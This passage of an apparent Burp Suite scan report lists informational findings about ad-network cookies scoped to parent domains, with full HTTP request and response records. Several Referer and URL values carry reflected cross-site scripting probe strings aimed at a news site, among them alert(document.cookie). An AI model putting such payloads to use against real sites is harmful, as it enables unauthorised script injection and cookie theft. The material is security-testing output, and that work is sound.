P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Length: 42
Expires: -1
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

12.32. http://i.w55c.net/ping_match.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wfivefivec=f37741cc-dd69-4eaf-b5cb-bc2965d953d9;Path=/;Domain=.w55c.net;Expires=Thu, 02-May-13 15:41:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?rurl=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D535039%26ev%3D_wfivefivec_ HTTP/1.1
Host: i.w55c.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 302 Found
Set-Cookie: wfivefivec=f37741cc-dd69-4eaf-b5cb-bc2965d953d9;Path=/;Domain=.w55c.net;Expires=Thu, 02-May-13 15:41:33 GMT
Cache-Control: private
X-Version: DataXu Pixel Tracker v3
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=535039&ev=f37741cc-dd69-4eaf-b5cb-bc2965d953d9
Server: Jetty(6.1.22)
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 0

12.33. http://ib.adnxs.com/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:41:36 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=$UID HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3658195966029417970&rnd=3874368748143201778&fpid=12&nu=y&t=&sp=n&purl=
Cookie: uuid2=4712109102545615229; icu=ChII3pUBEAoYBiAGKAYw27_K6gQQ27_K6gQYBQ..; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IV!kszdkNSo6@-y`OawuG(Le#W21[=q

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 04-May-2011 15:41:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:41:36 GMT; domain=.adnxs.com; HttpOnly
Location: http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=4712109102545615229
Date: Tue, 03 May 2011 15:41:36 GMT
Content-Length: 0

12.34. http://ib.adnxs.com/mapuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IAU+]T$90oGR?ck4d1-.XR##$nc$EQc68$mm; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=311&user=11fda490648f83c&seg_code=noseg&ord=1304437410 HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: uuid2=4712109102545615229; icu=ChII3pUBEAoYBiAGKAYw27_K6gQQ27_K6gQYBQ..; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IV!kszdkNSo6@-y`OawuG(Le#W21[=q; sess=1

Response

12.35. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
icu=ChII7IABEAoYASABKAEwpMWA7gQQpMWA7gQYAA..; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
acb317820=5_[r^208WM*c3rB20/dRn%/x5?enc=KVyPwvUoDEDy0k1iEFgJQAAAAKCZmQlA8tJNYhBYCUApXI_C9SgMQETWHf3Tbdd2fbkdUEPGZEGkIsBNAAAAACk9AwA3AQAAZAAAAAIAAAAGEgUABF8AAAEAAABVU0QAVVNEACwB-gAtHgAA9wgBAgUCAAUAAAAApx7ZMgAAAAA.&tt_code=cm.rev_lee&udj=uf%28%27a%27%2C+27%2C+1304437412%29%3Buf%28%27g%27%2C+1079%2C+1304437412%29%3Buf%28%27r%27%2C+332294%2C+1304437412%29%3Bppv%2882%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2884%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2811%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2882%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2884%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2887%2C+%278563433973720405572%27%2C+1304437412%2C+1304523812%2C+66646%2C+24324%29%3Bppv%28619%2C+%278563433973720405572%27%2C+1304437412%2C+1304523812%2C+66646%2C+24324%29%3Bppv%28620%2C+%278563433973720405572%27%2C+1304437412%2C+1304523812%2C+66646%2C+24324%29%3Bppv%28621%2C+%278563433973720405572%27%2C+1304437412%2C+1304523812%2C+66646%2C+24324%29%3B&cnd=!jBesJgjWiAQQhqQUGAAghL4BKAAxmpmZyfUoDEBCEwgAEAAYACABKP7__________wFCCghSEAAYACADKAFCCghUEAAYACADKAFIAVAAWK08YABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E66646; path=/; expires=Wed, 04-May-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IV!kszdkNSo6@-y`/H9#?HtZQZ.cyIxVm/e); path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_lee&size=300x250&imp_id=cm-77237941_1304437410,11fda490648f83c&referrer=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert%28%2522DORK%2522%29-%2522f8cf8d87874%3D1&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_lee%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-77237941_1304437410%2C11fda490648f83c%2CMiscellaneous%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D975335%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D0.3433780161396228%3F HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: uuid2=4712109102545615229; icu=ChII3pUBEAoYBiAGKAYw27_K6gQQ27_K6gQYBQ..; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IV!kszdkNSo6@-y`OawuG(Le#W21[=q; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 04-May-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII7IABEAoYASABKAEwpMWA7gQQpMWA7gQYAA..; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb317820=5_[r^208WM*c3rB20/dRn%/x5?enc=KVyPwvUoDEDy0k1iEFgJQAAAAKCZmQlA8tJNYhBYCUApXI_C9SgMQETWHf3Tbdd2fbkdUEPGZEGkIsBNAAAAACk9AwA3AQAAZAAAAAIAAAAGEgUABF8AAAEAAABVU0QAVVNEACwB-gAtHgAA9wgBAgUCAAUAAAAApx7ZMgAAAAA.&tt_code=cm.rev_lee&udj=uf%28%27a%27%2C+27%2C+1304437412%29%3Buf%28%27g%27%2C+1079%2C+1304437412%29%3Buf%28%27r%27%2C+332294%2C+1304437412%29%3Bppv%2882%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2884%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2811%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2882%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2884%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2887%2C+%278563433973720405572%27%2C+1304437412%2C+1304523812%2C+66646%2C+24324%29%3Bppv%28619%2C+%278563433973720405572%27%2C+1304437412%2C+1304523812%2C+66646%2C+24324%29%3Bppv%28620%2C+%278563433973720405572%27%2C+1304437412%2C+1304523812%2C+66646%2C+24324%29%3Bppv%28621%2C+%278563433973720405572%27%2C+1304437412%2C+1304523812%2C+66646%2C+24324%29%3B&cnd=!jBesJgjWiAQQhqQUGAAghL4BKAAxmpmZyfUoDEBCEwgAEAAYACABKP7__________wFCCghSEAAYACADKAFCCghUEAAYACADKAFIAVAAWK08YABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E66646; path=/; expires=Wed, 04-May-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IV!kszdkNSo6@-y`/H9#?HtZQZ.cyIxVm/e); path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 03 May 2011 15:43:32 GMT
Content-Length: 499

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_lee/;net=cm;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;;cmw=owl;sz=300x250;net=cm;ord1=97
...[SNIP]...

12.36. http://ib.adnxs.com/pxj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:43:39 GMT; domain=.adnxs.com; HttpOnly
uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:43:39 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IAU+]T$90oGR?ck4d1-.XR##$nc$EQc68$mm; path=/; expires=Mon, 01-Aug-2011 15:43:39 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1297100700-4279215%7cMUID%3d65b01ee3ec5f47d58dbc84e1bcdf22cc%7cTOptOut%3d0%7cEANON%3dA%253d0043022-cxGBKiuD3acc3gRvJK82QtvWKxz6hKqBxMo3idprcwkiaMTk9ZSYFgtvoE9dHRG880Y59A8ExoKb0hOM6kqeM%2526E%253dFFF%2526W%253d1%22); HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Cookie: uuid2=4712109102545615229; icu=ChII7IABEAoYASABKAEwo8WA7gQQo8WA7gQYAA..; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IAU+]T$90oGR?ck4d1-.XR##$nc$EQc68$mm; sess=1; acb430890=5_[r^208WM*c3rB20/dRmbko4?enc=KVyPwvUoDEDy0k1iEFgJQAAAAKCZmQlA8tJNYhBYCUApXI_C9SgMQMS7wwH_-fQOfbkdUEPGZEGjIsBNAAAAACk9AwA3AQAAZAAAAAIAAAAGEgUABF8AAAEAAABVU0QAVVNEACwB-gAtHgAAJRABAgUCAAUAAAAAWB7iTQAAAAA.&tt_code=cm.rev_lee&udj=uf%28%27a%27%2C+27%2C+1304437464%29%3Buf%28%27g%27%2C+1079%2C+1304437464%29%3Buf%28%27r%27%2C+332294%2C+1304437464%29%3Bppv%2882%2C+%271077761084489972676%27%2C+1304437464%2C+1314805464%2C+66646%2C+24324%29%3Bppv%2884%2C+%271077761084489972676%27%2C+1304437464%2C+1314805464%2C+66646%2C+24324%29%3Bppv%2811%2C+%271077761084489972676%27%2C+1304437464%2C+1314805464%2C+66646%2C+24324%29%3Bppv%2882%2C+%271077761084489972676%27%2C+1304437464%2C+1314805464%2C+66646%2C+24324%29%3Bppv%2884%2C+%271077761084489972676%27%2C+1304437464%2C+1314805464%2C+66646%2C+24324%29%3Bppv%2887%2C+%271077761084489972676%27%2C+1304437464%2C+1304523864%2C+66646%2C+24324%29%3Bppv%28619%2C+%271077761084489972676%27%2C+1304437464%2C+1304523864%2C+66646%2C+24324%29%3Bppv%28620%2C+%271077761084489972676%27%2C+1304437464%2C+1304523864%2C+66646%2C+24324%29%3Bppv%28621%2C+%271077761084489972676%27%2C+1304437464%2C+1304523864%2C+66646%2C+24324%29%3B&cnd=!jBesJgjWiAQQhqQUGAAghL4BKAAxmpmZyfUoDEBCEwgAEAAYACABKP7__________wFCCghSEAAYACADKAFCCghUEAAYACADKAFIAVAAWK08YABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E66646

Response

12.37. http://idpix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idpix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

clid=2lkaebs01171xcfgwn0ixqhg0c7xf0033f020j02502; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/
rdrlst=4021194lkmm97000000013f010znmlkmhha000000023f02; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/
sglst=20a0s8nelkmhha000000023f020j02502abflkmhha000000023f020j02502647lkmhha000000023f020j02502ag2lkmm97000000013f010j015019rylkmhha000000023f020j02502dg4lkmhha000000023f020j02502bnzlkmhha000000023f020j02502cgzlkmhha000000023f020j025020tilkmhha004rx0023f020j02502a6rlkmhha000000023f020j02502; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/
vstcnt=417s010r024smk6127p10024nnav118e1022; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=5392 HTTP/1.1
Host: idpix.media6degrees.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: clid=2lkaebs01171xcfgwn0ixqhg0c35i0023f010j01501; ipinfo=2lkaebs0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; vstcnt=417s010r024smk6127p10024nnav118e1022; acs=012020a1lkaebsxzt1c35i; rdrlst=4010znmlkmhha000000013f01; sglst=20a0sabflkmhha000000013f010j015018nelkmhha000000013f010j01501647lkmhha000000013f010j01501ag3lkmhha000000013f010j015019rylkmhha000000013f010j01501dg4lkmhha000000013f010j01501bnzlkmhha000000013f010j015010tilkmhha000000013f010j01501cgzlkmhha000000013f010j01501a6rlkmhha000000013f010j01501

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lkaebs01171xcfgwn0ixqhg0c7xf0033f020j02502; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4021194lkmm97000000013f010znmlkmhha000000023f02; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/
Set-Cookie: sglst=20a0s8nelkmhha000000023f020j02502abflkmhha000000023f020j02502647lkmhha000000023f020j02502ag2lkmm97000000013f010j015019rylkmhha000000023f020j02502dg4lkmhha000000023f020j02502bnzlkmhha000000023f020j02502cgzlkmhha000000023f020j025020tilkmhha004rx0023f020j02502a6rlkmhha000000023f020j02502; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/
Set-Cookie: vstcnt=417s010r024smk6127p10024nnav118e1022; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=531399&ev=1xcfgwn0ixqhg
Content-Length: 0
Date: Tue, 03 May 2011 15:41:30 GMT

12.38. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; domain=pubmatic.com; expires=Thu, 02-May-2013 15:41:12 GMT; path=/
PUBRETARGET=82_1399045272; domain=pubmatic.com; expires=Fri, 02-May-2014 15:41:12 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:3658195966029417970 HTTP/1.1
Host: image2.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3658195966029417970&rnd=3874368748143201778&fpid=12&nu=y&t=&sp=n&purl=

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:12 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; domain=pubmatic.com; expires=Thu, 02-May-2013 15:41:12 GMT; path=/
Set-Cookie: PUBRETARGET=82_1399045272; domain=pubmatic.com; expires=Fri, 02-May-2014 15:41:12 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html

12.39. http://k.collective-media.net/cmadj/cm.rev_lee/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.rev_lee/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

JY57=3kJqRfVWIsliNzmh12p72Uiw-sYF7o0ex_JQsPY6aZLx62OOd4kyhMQ; expires=Tue, 31-May-2011 15:43:30 GMT; path=/; domain=.collective-media.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/cm.rev_lee/;sz=300x250;net=cm;ord=0.3433780161396228;ord1=975335;cmpgurl=http%253A/www.maysville-online.com/content/%253Fc3a2e%252522-alert%2528%252522DORK%252522%2529-%252522f8cf8d87874%253D1?01AD=3kJqRfVWIsliNzmh12p72Uiw-sYF7o0ex_JQsPY6aZLx62OOd4kyhMQ&01RI=0B3057BAC5C6A5A&01NA= HTTP/1.1
Host: k.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: JY57=CT-1; cli=11fda490648f83c; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:43:30 GMT
Connection: close
Set-Cookie: JY57=3kJqRfVWIsliNzmh12p72Uiw-sYF7o0ex_JQsPY6aZLx62OOd4kyhMQ; expires=Tue, 31-May-2011 15:43:30 GMT; path=/; domain=.collective-media.net
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:30 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:30 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:43:30 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 03-May-2011 23:43:30 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Content-Length: 8097

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...

12.40. http://open.ad.yieldmanager.net/a1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://open.ad.yieldmanager.net
Path:	/a1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BX=ek8k2sl67ofpa&b=4&s=o9&t=122;path=/; expires=Tue, 03-May-2013 20:00:00 GMT;domain=.yieldmanager.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a1?V=4&pubId=22182210159&site=maysville-online.com&cntTy=js&cTopId=20201001&cSctn=index&ctLng=en-us&tagTy=multi_secure&nAdP=12&rFrame=1&flv=nf&cb=1304455224246&url=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert(document.cookie)-%2522ccebc516c28%3D1&sz0=1000x30&dlv0=ipatf&conTy0=fn_news&sltId0=0&sz1=1360x2000&dlv1=ipatf&conTy1=fn_news&sltId1=1&sz2=728x90&dlv2=ipatf&conTy2=fn_news&sltId2=2&sz3=88x31&dlv3=ipatf&conTy3=fn_news&sltId3=3&sz4=300x250&dlv4=ipatf&conTy4=fn_news&sltId4=4&sz5=300x250&dlv5=ipbtf&conTy5=fn_news&sltId5=5&sz6=120x90&dlv6=ipbtf&conTy6=fn_news&sltId6=6&sz7=120x90&dlv7=ipbtf&conTy7=fn_news&sltId7=7&sz8=800x600&dlv8=ipatf&conTy8=fn_news&sltId8=8&sz9=300x600&dlv9=ipatf&conTy9=fn_news&sltId9=9&sz10=120x600&dlv10=ipatf&conTy10=fn_news&sltId10=10&sz11=728x90&dlv11=ipbtf&conTy11=fn_news&sltId11=11&ref=http%3A%2F%2Fburp%2Fshow%2F0&byt=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22ledger%20independent%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22The%20Ledger%20Independent%20%7C%201-800-264-9091%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22Ledger%20Independent%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2Ftncms%2Flive%2Fglobal%2Fresources%2Fimages%2Fledger_logo.jpg%22%3E%0A&SIG=10vjvn1cb;x-cookie=rx8x2fy67bscn&o=4&f=b9 HTTP/1.1
Host: open.ad.yieldmanager.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response

HTTP/1.1 200 OK
